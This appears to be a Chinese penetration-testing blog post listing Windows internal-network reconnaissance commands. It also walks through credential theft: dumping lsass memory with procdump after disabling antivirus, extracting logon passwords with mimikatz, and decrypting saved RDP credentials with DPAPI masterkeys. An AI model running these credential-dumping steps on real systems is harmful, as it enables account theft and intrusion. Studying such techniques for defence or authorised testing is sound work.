首页 > 其他分享 >【渗透测试】内网信息收集的十三种基本方式

【渗透测试】内网信息收集的十三种基本方式

时间:2024-09-18 15:14:30浏览次数:9  
标签:dmp 收集 渗透 lsass 端口 信息 十三种 mimikatz 连接

本文的主题为基本的信息收集方式,不包含域内信息收集,域内信息收集得再过几天看看,用的windows server 2019内核版本比较高,还有一些信息收集技巧行不通,比如检查杀毒软件情况,就不举例了

一些工具准备

mimikatz:https://github.com/ParrotSec/mimikatz

ProcDump:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

当前用户信息

查看当前用户信息,RID,组信息,特权信息

whoami /all

image-20240905101003965

image-20240905101020438

image-20240905101033968

系统信息

systeminfo

image-20240905142138399

网络及端口状态

netstat -an

这里,-a 表示显示所有连接和监听端口,-n 表示以数字形式显示地址和端口号。

image-20240905143044809

LISTENING:表示监听中,这个端口正在开放,可以提供服务

SYN_SENT:客户端已经发送连接请求(SYN),并正在等待服务器的确认(SYN-ACK报文)。这是TCP三次握手过程中的一个状态。

CLOSED:连接已关闭,不再存在。

TIME_WAIT:连接已关闭,但TCP协议规定在这段时间内(通常是2倍的最大报文存活时间,即2MSL)不能立即使用该连接相同的四元组(源IP、源端口、目标IP、目标端口)建立新的连接,以防止旧连接的残留数据干扰新连接。【MSL,报文最大生存时间可能是30秒、1分钟或2分钟,取决于操作系统】

ESTABLISHED:连接已成功建立,数据可以在客户端和服务器之间双向传输。比如HTTP/HTTPS,FTP,SMTP,SSH,MYSQL,RDP(windows远程桌面服务)等

当前主机名称

hostname

image-20240905145123833

当前操作系统

wmic OS

image-20240905145455078

这么不好看?就使用get命令对每一列进行筛选,赛选常用的信息

image-20240905145635717

wmic OS get Caption,CSDVersion,OSArchitecture,Version

image-20240905145906782

安装的应用程序

wmic product get name,version

image-20240905154110362

在线用户

quser

image-20240905154228123

网络配置

ipconfig /all

image-20240905154307635

查看进程

tasklist /v

image-20240905161009326

查看当前登录域

net config workstation

image-20240905161459979

远程桌面连接历史记录

有的话就有,可以把凭证取下来进行本地解密、没有的话会显示无

cmdkey /list

image-20240905161920815

以下是解密过程(失败了)参考的:https://www.cnblogs.com/websecyw/p/12842741.html

查看是否存在凭证,记录好这个红色框值,和目录进行拼接

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
# 拼接后的文件路径待会要用
C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

image-20240905181423506

lsass.dmp文件默认情况下并不能直接复制,所以要用到procdump工具打包凭证信息(本文演示的为没有杀毒的操作,记得先关闭杀毒软件,不然会拒绝访问)

procdump.exe -accepteula -ma lsass.exe lsass.dmp

image-20240905164311440

把这个目录下得lsass.dmp复制到mimikatz目录下

copy lsass.dmp C:\Users\Administrator\Desktop\mimikatz\mimikatz

image-20240905175840747

使用工具mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

image-20240905180631025

记录好guidMasterKey,为{a77cdf8b-ca6e-4a91-a406-d1ab7105712e}

image-20240905184525397

获取对应得MasterKey

sekurlsa::dpapi

image-20240905181115959

找到之前所对应得guid得到masterkey,使用Masterkey解密凭证得到明文密码

dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:fcffc5d85122c8bb31d33e927009e0c939b65a1d335565e7c5e12fd17555b625ad6a6fc03244dad05c0f026d1e425fcb5d8dc77bd4c6205d847e7526e6b2f38b

确保你的系统没有打补丁(也许不是补丁,我用的winserver2019),不然就解密失败,这里我的失败了,下次再试试

本机用户

net user

image-20240905190433411

某用户的X信息

net user 用户名

image-20240905190607174

往期推荐

【JS逆向】某大型音乐平台JS逆向分析

【流量分析】Java框架Shiro、工具利用、漏洞复现以及流量特征分析

【渗透测试】12种rbash逃逸方式总结

最新可用,bp+charles小程序抓包教程

DocCMS 网站存在SQL注入漏洞

标签:dmp,收集,渗透,lsass,端口,信息,十三种,mimikatz,连接
From: https://www.cnblogs.com/xiaoyus/p/18418553

相关文章

  • 洛谷P4550 收集邮票 题解 期望DP
    题目链接:https://www.luogu.com.cn/problem/P4550解题思路:定义状态\(f_i\)表示目前已经取到\(i\)种邮票的情况下,取完所有\(n\)很明显,\(f_n=0\),因为此时已经取完了\(n\)如果当前已经取到了\(i\)有\(\frac{i}{n}\)的概率取到现有的邮票(此时仍然拥有\(i\)有\(1-\frac{i......
  • 渗透测试中16款实用的谷歌插件分享
    所有插件我都放在这个网盘链接了,自行下载即可https://pan.quark.cn/s/2b4f4823fb3b效果图如下首先打开谷歌浏览器,-》扩展程序启动开发者模式打开谷歌版本信息,获取插件路径浏览器输入chrome://version将插件压缩包全部解压放在这个路径就ok了,C:\Users\Admini......
  • 揭秘最为知名的黑客工具之一: Netcat!适用安全测试、渗透测试、黑客攻击!
    在网络安全领域,黑客工具一直备受关注。它们既可以被用于攻击,也可以用于防御。本文将为大家揭秘一款知名的黑客工具:Netcat。1、Netcat是什么?Netcat被誉为“网络的瑞士军刀”,简称为nc,是一个功能丰富的网络工具。最早是一个简单的TCP/IP工具,用于在网络上传输数据。随着时间的推......
  • 数据集的收集
    我在这里找到了一个数据集的网站:https://www.kaggle.com/datasets我这里找到了三个小数据集为例子分别如下: 我写的数据分析如下:1.数据集名称房价回归数据集 来源 https://www.kaggle.com/datasets/prokshitha/home-value-insights?resource=download......
  • 内网渗透- 内网渗透的基本知识
    攻击流程讲解内网介绍内网也指局域网,是指在某一区域内由多台计算机互联而成的计算机组,组网范围通常在数千米以内。在局域网中,可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等。内网是封闭的,可以由办公室内的两台计算机组成,也可......
  • 104.WEB渗透测试-信息收集-FOFA语法(4)
    免责声明:内容仅供学习参考,请合法利用知识,禁止进行违法犯罪活动!内容参考于:易锦网校会员专享课上一个内容:103.WEB渗透测试-信息收集-FOFA语法(3)打开fofa搜索引擎搜索输入:domain="qimai.cn"&&"app="vmware-SpringBoot-Framework"搜索发现没有没有就是不存在,有的话就是......
  • .NET 一款免安装运行Python的渗透工具
    .NET一款免安装运行Python的渗透工具在网络安全领域,渗透测试是评估系统安全性的重要手段。Python作为一种功能强大且易于使用的编程语言,在渗透测试工具开发中得到了广泛应用。然而,Python环境的安装和配置可能会给渗透测试人员带来一些不便,尤其是在目标机器上缺乏管理员权限的情况......
  • Kali Linux 2024.3 发布下载 - 领先的渗透测试发行版
    KaliLinux2024.3发布(Multipletransitions)-领先的渗透测试发行版ThemostadvancedPenetrationTestingDistribution请访问原文链接:https://sysin.org/blog/kali-linux/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgKaliLinux2024.3已经可以下载,发行......
  • 红队打点的思路与信息收集
    目录打点思路核心目的区域介绍打法思路主要边界目的:打法近源攻击目的打法外联攻击目的打法公有云目的打法内网横向目的打法信息收集企业基础信息收集企业安全防护收集企业互联网资产信息工具指纹识别工具:Host碰撞工具:403bypass打点思路核心目的为权限落点......
  • Datadog 监控最佳实践 | 收集正确的数据
    本文是Datadog“高效监控”系列的第一篇,后面还会有第二篇《针对重要事项发出警报》和《调查性能问题》。监控数据有多种形式-一些系统不断地输出数据,而另一些系统仅在罕见事件发生时才产生数据。有些数据主要用于识别发现问题、有些数据主要用于调查问题。更宽泛地说,监控数据是......